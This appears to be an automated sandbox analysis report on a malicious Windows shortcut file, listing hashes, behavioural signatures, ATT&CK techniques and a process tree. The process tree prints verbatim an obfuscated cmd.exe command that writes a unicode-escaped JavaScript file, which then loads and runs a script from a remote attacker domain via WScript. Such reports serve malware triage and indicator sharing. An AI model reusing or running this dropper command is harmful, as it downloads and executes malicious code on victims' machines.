5fc489c4e1ca429a879cd6bf42202d00d414f4bc6492d50cb1c58e8289b1df78

General

Target

mconsultar64244.lnk
Size

1KB
MD5

c76be1a2d01d0e31c701aecad02653cc
SHA1

d6768a29cf3c642afcfa8daba17705440700860b
SHA256

9d70dfa10c73c0b080fcaa8fc97128b10e21dab55aebebbd726a6fa062f435c1
SHA512

79117a7b5b3f727085c97179d133136e9f9c31031e77401a634de2fe9979b6d4fbd9d8f11e95139feb2ec532ea75c8f252151cfd434be24750c33198d95383e2

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	4092	WScript.exe
12	4092	WScript.exe
15	4092	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2168	conhost.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 2168	2164	cmd.exe	85
PID 2164 wrote to memory of 2168	2164	cmd.exe	85
PID 2168 wrote to memory of 4288	2168	conhost.exe	86
PID 2168 wrote to memory of 4288	2168	conhost.exe	86
PID 4288 wrote to memory of 2832	4288	cmd.exe	87
PID 4288 wrote to memory of 2832	4288	cmd.exe	87
PID 4288 wrote to memory of 3544	4288	cmd.exe	88
PID 4288 wrote to memory of 3544	4288	cmd.exe	88
PID 3544 wrote to memory of 4092	3544	cmd.exe	89
PID 3544 wrote to memory of 4092	3544	cmd.exe	89

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\mconsultar64244.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2164
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT VXJ=C:\7sNQ5H\&& mD !VXJ!>nul 2>&1&&S^eT EYUT=!VXJ!^XNRRKAOO.JS&&<nul set/p QXJC=var QXJC='\u005a\u006a\u0074\u002b\u0044\u005a\u006a\u0074\u002b\u0045\u005a\u006a\u0074\u002b\u0022\u002f\u002f\u0038\u0066\u0065\u0074\u0064\u0062\u0073\u0069\u0061\u0065\u0036\u002e\u0072\u006f\u0073\u0061\u0075\u0072\u0061\u006e\u0061\u0070\u006f\u006c\u0065\u006f\u0071\u0075\u0069\u006e\u0074\u0061\u006e\u0069\u006c\u0068\u0061\u002e\u0070\u0069\u0063\u0073\u002f\u003f\u0031\u002f\u0022\u0029\u003b';VXJ='\u003a\u0068\u0022\u003b\u0045\u005a\u006a\u0074\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XNRR='\u0076\u0061\u0072\u0020\u0043\u005a\u006a\u0074\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u005a\u006a\u0074\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';EYUT=XNRR+VXJ+QXJC;KAOO=new Function(EYUT);KAOO(); >!EYUT!|caLl !EYUT!||caLl !EYUT! "
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "S^eT VXJ=C:\7sNQ5H\&& mD !VXJ!>nul 2>&1&&S^eT EYUT=!VXJ!^XNRRKAOO.JS&&<nul set/p QXJC=var QXJC='\u005a\u006a\u0074\u002b\u0044\u005a\u006a\u0074\u002b\u0045\u005a\u006a\u0074\u002b\u0022\u002f\u002f\u0038\u0066\u0065\u0074\u0064\u0062\u0073\u0069\u0061\u0065\u0036\u002e\u0072\u006f\u0073\u0061\u0075\u0072\u0061\u006e\u0061\u0070\u006f\u006c\u0065\u006f\u0071\u0075\u0069\u006e\u0074\u0061\u006e\u0069\u006c\u0068\u0061\u002e\u0070\u0069\u0063\u0073\u002f\u003f\u0031\u002f\u0022\u0029\u003b';VXJ='\u003a\u0068\u0022\u003b\u0045\u005a\u006a\u0074\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XNRR='\u0076\u0061\u0072\u0020\u0043\u005a\u006a\u0074\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u005a\u006a\u0074\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';EYUT=XNRR+VXJ+QXJC;KAOO=new Function(EYUT);KAOO(); >!EYUT!|caLl !EYUT!||caLl !EYUT! "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" set/p QXJC=var QXJC='\u005a\u006a\u0074\u002b\u0044\u005a\u006a\u0074\u002b\u0045\u005a\u006a\u0074\u002b\u0022\u002f\u002f\u0038\u0066\u0065\u0074\u0064\u0062\u0073\u0069\u0061\u0065\u0036\u002e\u0072\u006f\u0073\u0061\u0075\u0072\u0061\u006e\u0061\u0070\u006f\u006c\u0065\u006f\u0071\u0075\u0069\u006e\u0074\u0061\u006e\u0069\u006c\u0068\u0061\u002e\u0070\u0069\u0063\u0073\u002f\u003f\u0031\u002f\u0022\u0029\u003b';VXJ='\u003a\u0068\u0022\u003b\u0045\u005a\u006a\u0074\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XNRR='\u0076\u0061\u0072\u0020\u0043\u005a\u006a\u0074\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u005a\u006a\u0074\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';EYUT=XNRR+VXJ+QXJC;KAOO=new Function(EYUT);KAOO(); 0<nul 1>C:\7sNQ5H\XNRRKAOO.JS"
      4⤵
      PID:2832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" caLl C:\7sNQ5H\XNRRKAOO.JS"
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3544
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\7sNQ5H\XNRRKAOO.JS"
        5⤵
        Blocklisted process makes network request
        
        PID:4092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\7sNQ5H\XNRRKAOO.JS

Filesize
834B

MD5
d3fc75e8ca1457ba0b10a3391e423fe1

SHA1
8bb1e268aa7e5d9cbc711fc48dced389a9ab6121

SHA256
105206a72144e2b52c4ef42a0fa44335d680f3cbaddcf17b29a3fe5b4dade5b9

SHA512
3052722410921c12deab8d55c8abc1083201651ecb2a47749ec326b664978ddbb4bf72ddcc383aeb397debabe39097cda674da58c2d4801ed0429ded29707a02

Download Submit
C:\Users\Admin\AppData\Local\Temp\mconsultar64244.lnk

Filesize
2KB

MD5
8eda75d738a80f5077dcad8206f62387

SHA1
c72f3eea26d8c84aad7166df5570a49e372f672a

SHA256
5c1c0c09c820c583f79cc8cde73d33cab56d5818469cc8b61cc3fb0ef0d182e0

SHA512
cf725bb804021c98d4ce9e45893f113cbb02d3927483f1c426f51fee3482a65dbcf91ca33bb769fe19725dc7b84696945d561fe17c5ad42d5e57ac10bf99881b

Download Submit

Analysis

Sharing